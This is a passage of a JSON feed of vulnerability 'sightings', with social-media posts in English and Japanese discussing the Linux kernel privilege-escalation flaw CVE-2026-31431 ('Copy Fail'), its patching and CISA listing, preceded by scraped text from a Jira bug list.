Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1555\n                      [Houston-1.780] 500 internal server error for \"search\"call inside stop module\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 06, 2026 at 10:12 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-06T22:12:42.000000Z"}, {"uuid": "0e39e51d-dae5-4877-9317-9d6de9e3ba98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3ml7sgjqeef2d", "content": "Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail)  #IPA (May 1)\n\nwww.ipa.go.jp/security/sec...", "creation_timestamp": "2026-05-06T22:58:10.527487Z"}, {"uuid": "ff121eef-9222-45d5-8af3-36bd72b70573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mla5x5pmkve2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required bb77: By now, most distributions should offer fixed kernel versions. Unfortunately, Ubuntu has not yet rele...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-07T02:24:20.826807Z"}, {"uuid": "ee2947b7-19c8-45d7-8b7b-02ec866169a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mla6bbmmbf2m", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 516 interactions\nCVE-2026-41940: 123 interactions\nCVE-2025-31431: 29 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0300: 19 interactions\nCVE-2026-31431: 8 interactions\nCVE-2026-23918: 5 interactions\n", "creation_timestamp": "2026-05-07T02:29:59.211406Z"}, {"uuid": "c07a7798-672b-4083-8e70-71533f4ad62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ml7iojj2322z", "content": "Linux\u306e\u65b0\u305f\u306a\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4e3b\u8981\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u304c\u53ef\u80fd\u306b\n\n\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u3089\u306f\u3001Linux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\uff08LPE\uff09\u306e\u8106\u5f31\u6027\u306e\u8a73\u7d30\u3092\u660e\u3089\u304b\u306b\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3059\u308c\u3070\u3001\u6a29\u9650\u3092\u6301\u305f\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u3002\n\nCVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a2\uff1a7.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3066\u3044\u308b\u6df1\u523b\u5ea6\u306e\u9ad8\u3044\u8106\u5f31\u6027\u306f\u3001Xint.io\u3068Theori\u306b\u3088\u3063\u3066Copy Fail\u3068\u3044\u3046\u30b3\u30fc\u30c9\u30cd\u30fc\u30e0\u304c\u4ed8\u3051\u3089\u308c\u307e\u3057\u305f\u3002\n\n\u300c\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u306f\u3001Linux\u30b7\u30b9\u30c6\u30e0\u4e0a\u306e\u8aad\u307f\u53d6\u308a\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u306b4\u30d0\u30a4\u30c8\u306e...", "creation_timestamp": "2026-05-06T20:03:45.381561Z"}, {"uuid": "8f5a5709-510c-442f-ab1e-2b93e84ee84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ml7isk3o222z", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u30ed\u30b8\u30c3\u30af\u306e\u6b20\u9665\u306b\u3088\u308a\u30b7\u30b9\u30c6\u30e0\u4e57\u3063\u53d6\u308a\u304c\u53ef\u80fd\u306b\n\nCVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a27.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001 \u300cCopy Fail\u300d\u3068\u547c\u3070\u308c\u3066\u3044\u308b\u3053\u306e\u554f\u984c\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u3059\u3079\u3066\u306eLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u308b\u3068\u8003\u3048\u3089\u308c\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u6b20\u9665\u306f\u3001IPsec\u304c\u62e1\u5f35\u30b7\u30fc\u30b1\u30f3\u30b9\u756a\u53f7\uff08ESN\uff09\u306e\u30b5\u30dd\u30fc\u30c8\u306b\u4f7f\u7528\u3059\u308b \u30ab\u30fc\u30cd\u30eb\u306e\u8a8d\u8a3c\u4ed8\u304d\u6697\u53f7\u5316\uff08AEAD\uff09\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u307e\u3059\u3002\n\nTheori\u6c0f\u306b\u3088\u308b\u3068\u3001\u554f\u984c\u306fLinux\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u30da\u30fc\u30b8\u3092\u66f8\u304d\u8fbc\u307f\u53ef\u80fd\u306a\u30b9\u30ad\u30e3\u30c3\u30bf\u30fc\u30ea\u30b9\u30c8\u306b\u914d\u7f6e\u3059\u308b\u3053\u3068\u3001authencesn\u304c\u547c...", "creation_timestamp": "2026-05-06T20:05:58.547194Z"}, {"uuid": "bee1c039-f5e5-4cbc-9487-f3724786a938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3ml7lawv3vk2v", "content": "PAN-OS CVE-2026-0300 zero-day exploited (CVSS 9.3)\nLinux 'Copy Fail' CVE-2026-31431 LPE\nAPT37 BirdCall, MuddyWater Teams decoy, ShinyHunters 280M Instructure records\n\nFull brief: intel.overresearched.net/2026/05/06/c...\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-05-06T20:49:48.038201Z"}, {"uuid": "0e1915fa-3c78-4dcf-9221-b010001ed231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/serena666.bsky.social/post/3ml7lzrmaaq2k", "content": "BEFORE: Cloud was secure. AFTER: \"Copy Fail\" (CVE-2026-31431) lets any rando get root on your Linux box. Millions of k8s clusters at risk. Patch NOW or get pwned. \ud83e\udd26", "creation_timestamp": "2026-05-06T21:03:41.096305Z"}, {"uuid": "93dcfbdf-4a8b-49c1-9bfe-e7b2b86eb2cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dfedmpls.bsky.social/post/3ml7m4ungtk2t", "content": "Holy shit CVE-2026-31431\n\nnvd.nist.gov/vuln/detail/...", "creation_timestamp": "2026-05-06T21:05:24.092237Z"}, {"uuid": "19812639-2563-4147-a1fd-d22081ccfb24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3ml7zatjnfv2f", "content": "CISA\u304c\u65e2\u77e5\u306e\u60aa\u7528\u3055\u308c\u305f\u8106\u5f31\u6027\u30921\u4ef6\u30ab\u30bf\u30ed\u30b0\u306b\u8ffd\u52a0 \n\nCISA Adds One Known Exploited Vulnerability to Catalog  #CISA (May 1)\n\nCVE-2026-31431 Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u30b9\u30d5\u30a3\u30a2\u9593\u306e\u4e0d\u9069\u5207\u306a\u30ea\u30bd\u30fc\u30b9\u8ee2\u9001\u306e\u8106\u5f31\u6027 \n\nwww.cisa.gov/news-events/...", "creation_timestamp": "2026-05-07T01:00:15.466984Z"}, {"uuid": "96c2d2a3-934d-41f3-96b6-9e4eb24df34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/artstradamagazine.bsky.social/post/3mla3gkzpik2v", "content": "CVE-2026-31431, commonly known as Copy Fail, is a vulnerability in the Linux kernel that allows unauthorized privilege escalation,[1][2] disclosed by security firm Theori to the public on 29 April 2026 and to the Linux kernel security team five weeks prior\nen.wikipedia.org/wiki/Copy_Fail", "creation_timestamp": "2026-05-07T01:39:18.069183Z"}, {"uuid": "0ed56e38-c11f-4210-b109-e4068d12018e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mlak2sysda2m", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-07T06:01:07.477112Z"}, {"uuid": "cddf4091-d7a4-4935-801b-b271941d1ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dbt3.ch/post/3mlb64luoey26", "content": "A nine-year Linux kernel bug is being actively exploited right now. CVE-2026-31431 (Copy Fail) gives any unprivileged local user a root shell. Works every time. Leaves no trace on disk. Patch status + fixes for Proxmox, Debian, and more in the video.\n\n\u27a1\ufe0f\u27a1\ufe0f Watch Here: https://youtu.be/LwqEUiuXmbg", "creation_timestamp": "2026-05-07T12:00:02.412568Z"}, {"uuid": "6dac81a0-32b1-4f72-a52d-86ecdbd314d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mlbgryvtcx2q", "content": "\ud83d\udd17 CVE : CVE-2024-41073, CVE-2024-53216, CVE-2025-37861, CVE-2025-40252, CVE-2025-68724, CVE-2025-68741, CVE-2025-71238, CVE-2026-23097, CVE-2026-23136, CVE-2026-23191, CVE-2026-23193, CVE-2026-23243, CVE-2026-23270, CVE-2026-23401, CVE-2026-31402, CVE-2026-31419, CVE-2026-31431, CVE-2026-31532", "creation_timestamp": "2026-05-07T14:35:12.852611Z"}, {"uuid": "7c62faa7-9a87-4bc5-bca9-51454af6c1a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mlapldvvpad2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required They have released midigations for all affected versions on April 30: Fixes available for CVE-2026-31431 (C...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-07T07:39:55.181572Z"}]}